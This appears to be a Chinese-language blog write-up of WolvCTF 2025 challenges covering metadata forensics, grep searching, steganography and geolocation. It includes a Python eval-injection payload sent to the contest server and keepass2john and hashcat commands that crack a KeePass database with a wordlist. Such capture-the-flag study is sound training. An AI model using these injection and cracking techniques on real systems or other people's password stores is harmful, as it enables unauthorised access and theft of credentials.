比赛地址:WolvCTF 2025
比赛时间:22 Mar 2025 07:00 CST - 24 Mar 2025 07:00 CST
复现的题目用🔁标注
Beginner PicturePerfect - Forensics Challenge PicturePerfect - Forensics
Author: carmengh
Wow what a respectful, happy looking lad! Hmmmmmmm, all I see is a snowman… maybe some details from the image file itself will lead us to the flag.
Unlock Hint for 0 points Images have interesting information in their metadata!
Solution 直接看元信息即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 exiftool-13.25_64>exiftool hi_snowman.jpg ExifTool Version Number : 13.25 File Name : hi_snowman.jpg Directory : . File Size : 4.1 MB Zone Identifier : Exists File Modification Date/Time : 2025:03:23 22:34:32+08:00 File Access Date/Time : 2025:03:23 22:57:47+08:00 File Creation Date/Time : 2025:03:23 22:57:36+08:00 File Permissions : -rw-rw-rw- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.01 Resolution Unit : inches X Resolution : 96 Y Resolution : 96 Exif Byte Order : Big-endian (Motorola, MM) Padding : (Binary data 268 bytes, use -b option to extract) XMP Toolkit : Image::ExifTool 11.88 About : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b Title : wctf{d0_yOU_w@nt_t0_BUiLd_a_Sn0Wm@n} Image Width : 3024 Image Height : 4032 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2) Image Size : 3024x4032 Megapixels : 12.2
1 wctf{d0_yOU_w@nt_t0_BUiLd_a_Sn0Wm@n}
DigginDir - Forensics Challenge DigginDir - Forensics
Author: carmengh
So I tripped on an uneven sidewalk today… and I dropped the flag somewhere (oops). It’s gotta be here somewhere… right?
Unlock Hint for 0 points I wish there was a linux utility that let me search for stuff...
Solution 在 Linux 下搜索
1 2 3 ┌──(kali㉿kali)-[~/桌面/challenge] └─$ grep -r "wctf{" . ./pics/WolvCTF2025/EUOlptwlpqPt5qrGlMnFpbat6/.secret:wctf{0h_WOW_tH@Nk5_yOu_f0U^d_1t_xD}
或者在 VSCode 搜
1 wctf{0h_WOW_tH@Nk5_yOu_f0U^d_1t_xD}
Misc Eval is Evil Challenge Eval is Evil
Author: EmptyBytes
If eval is so bad, then why is it so easy to use?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 import randomdef main (): print ("Let's play a game, I am thinking of a number between 0 and" , 2 ** 64 , "\n" ) try : guess = eval (input ("What is the number?: " )) except : guess = 0 correct = random.randint(0 , 2 **64 ) if (guess == correct): print ("\nCorrect! You won the flag!" ) flag = open ("flag.txt" , "r" ).readline() print (flag) else : print (guess) print (correct) print ("\nYou lost lol" ) main()
Solution 这里使用了 random 库来生成随机数,并且将生成的随机数 correct 与输入 guess 进行了对比,只要想办法让这两者相等就会返回 flag 了(废话
这里的 eval() 就留下了可操作空间
去找了一下 random 库的用法,了解到当设定了 random.seed() 的值之后再用 random 库生成伪随机数将会是一个固定值
因此构造出下面这一个 payload,先设定 random.seed(0),然后像源码一样调用 random.randint(0, 2**64),最后再次设定 random.seed(0),这样一来在下一次生成的 “随机数” 就会是和这次的是一样的
1 (random.seed(0 ), random.randint(0 , 2 **64 ), random.seed(0 ))[1 ]
1 2 3 4 5 6 7 8 E:\Desktop>ncat evalisevil.kctf-453514-codelab.kctf.cloud 1337 == proof-of-work: disabled == Let's play a game, I am thinking of a number between 0 and 18446744073709551616 What is the number?: (random.seed(0), random.randint(0, 2**64), random.seed(0))[1] Correct! You won the flag! wctf{Why_Gu3ss_Wh3n_Y0u_C4n_CH34T}
1 wctf{Why_Gu3ss_Wh3n_Y0u_C4n_CH34T}
Forensics 🔁Passwords Challenge Passwords
Author: dree
I heard you’re a hacker. Can you help me get my passwords back?
Database.kdbx
Solution 附件是一个 KeePass 数据库,尝试爆破
这里用到一个工具 ivanmrsulja/keepass2john ,它可以将 KeePass 数据库(kdbx)转换为 John the Ripper 的格式
1 python keepass2john.py Database.kdbx > hash.txt
把得到的 hash.txt 开头的 Database<SHOULD_BE_REMOVED_INCLUDING_COLON>: 删掉,留下下面的部分
1 $keepass$*2*6000*222*5bd85bff1c654df5d8cb8f64b877ea179b66978615917c39faf6edd98444928b*dec1f1a8a46d2257b1c536800ccea618d15523c983162f1a760d0f0e3f32bed6*02dc62f9e295c9a256e4e231b3102c1a*8ed6478291ac58151a98e7465f10a11e8cafc1706d048ef4f94fe51453f091bc*193dd9a5673c4a3f5b33dd59639f27760f03285044f14eacc652f4a441b45413
然后用 hashcat 进行破解
1 hashcat -a 0 -m 13400 hash.txt ./pics/WolvCTF2025/wordlists/rockyou.txt
这里的 rockyou.txt 是 kali 自带的字典 /usr/share/wordlists/rockyou.txt.gz,我把它从虚拟机复制到了我的物理机上
下面是执行命令后的输出
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 hashcat (v6.2.6) starting * Device This may cause "CL_OUT_OF_RESOURCES" or related errors. To disable the timeout , see: https://hashcat.net/q/timeoutpatch * Device This may cause "CL_OUT_OF_RESOURCES" or related errors. To disable the timeout , see: https://hashcat.net/q/timeoutpatch nvmlDeviceGetFanSpeed(): Not Supported CUDA API (CUDA 12.7) ==================== * Device OpenCL API (OpenCL 3.0 CUDA 12.7.33) - Platform ======================================================================= * Device Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Single-Hash * Single-Salt Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 1475 MB Dictionary cache built: * Filename..: ./pics/WolvCTF2025/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 1 sec $keepass$*2*6000*222*5bd85bff1c654df5d8cb8f64b877ea179b66978615917c39faf6edd98444928b*dec1f1a8a46d2257b1c536800ccea618d15523c983162f f1a760d0f0e3f32bed6*02dc62f9e295c9a256e4e231b3102c1a*8ed6478291ac58151a98e7465f10a11e8cafc1706d048ef4f94fe51453f091bc*193dd9a5673c4a3 3f5b33dd59639f27760f03285044f14eacc652f4a441b45413:goblue1 Session..........: hashcat Status...........: Cracked Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES)) Hash.Target......: $keepass$*2*6000*222*5bd85bff1c654df5d8cb8f64b877ea...b45413 Time.Started.....: Thu Mar 27 20:32:01 2025 (1 sec) Time.Estimated...: Thu Mar 27 20:32:02 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (./pics/WolvCTF2025/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 181.7 kH/s (9.00ms) @ Accel:8 Loops:256 Thr:256 Vec:1 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 98304/14344385 (0.69%) Rejected.........: 0/98304 (0.00%) Restore.Point....: 49152/14344385 (0.34%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:5888-6000 Candidate.Engine.: Device Generator Candidates.#1....: truckin -> Donovan Hardware.Mon.#1..: Temp: 49c Util: 28% Core:2535MHz Mem:8000MHz Bus:8 Started: Thu Mar 27 20:31:59 2025 Stopped: Thu Mar 27 20:32:03 2025
因此密码就是 goblue1
用 KeeWeb 在线打开这个数据库
1 wctf{1_th0ught_1t_w4s_s3cur3?}
🔁Breakout Challenge Breakout
Author: Sudojacob
Something fishy about that photo… What could be hidden in this game?
Solution
1 steghide extract -sf breakout.jpg
用 steghide 提取,密码是空的
1 2 3 steghide extract -sf breakout.jpg Enter passphrase: wrote extracted data to "breakout.ch8".
提取出一个文件 breakout.ch8
在网上找了一下,发现 .ch8 文件是为 Chip-8 虚拟机设计的程序文件
然后找到了这个在线的模拟器 CHIP-8 Emulator ,该项目在 GitHub 开源 eth-p/uni-chip8
通过这个简单的小游戏就能看到 flag 了
1 WCTF{GAME_OVER_VMASBKLTNUFMGS}
OSINT Wintery Challenge Wintery
Author: pradhamk
As the snow has once again started to fall, I spotted a flag afar. Can you find where this picture was taken? Truncate your coordinates to 3 decimal places.
Flag format: wctf
查看提示 flag is in format wctf{##.##a,##.##b} where a+b == 4
no leading zero, no space
Solution 从图里的旗帜可以定位到密歇根大学(University of Michigan)
然后在谷歌街景可以找到这个地方 530 S State St - Google 地圖
根据照片中的信息推测出拍照地点是这栋楼
选了个附近的点
符合题目条件
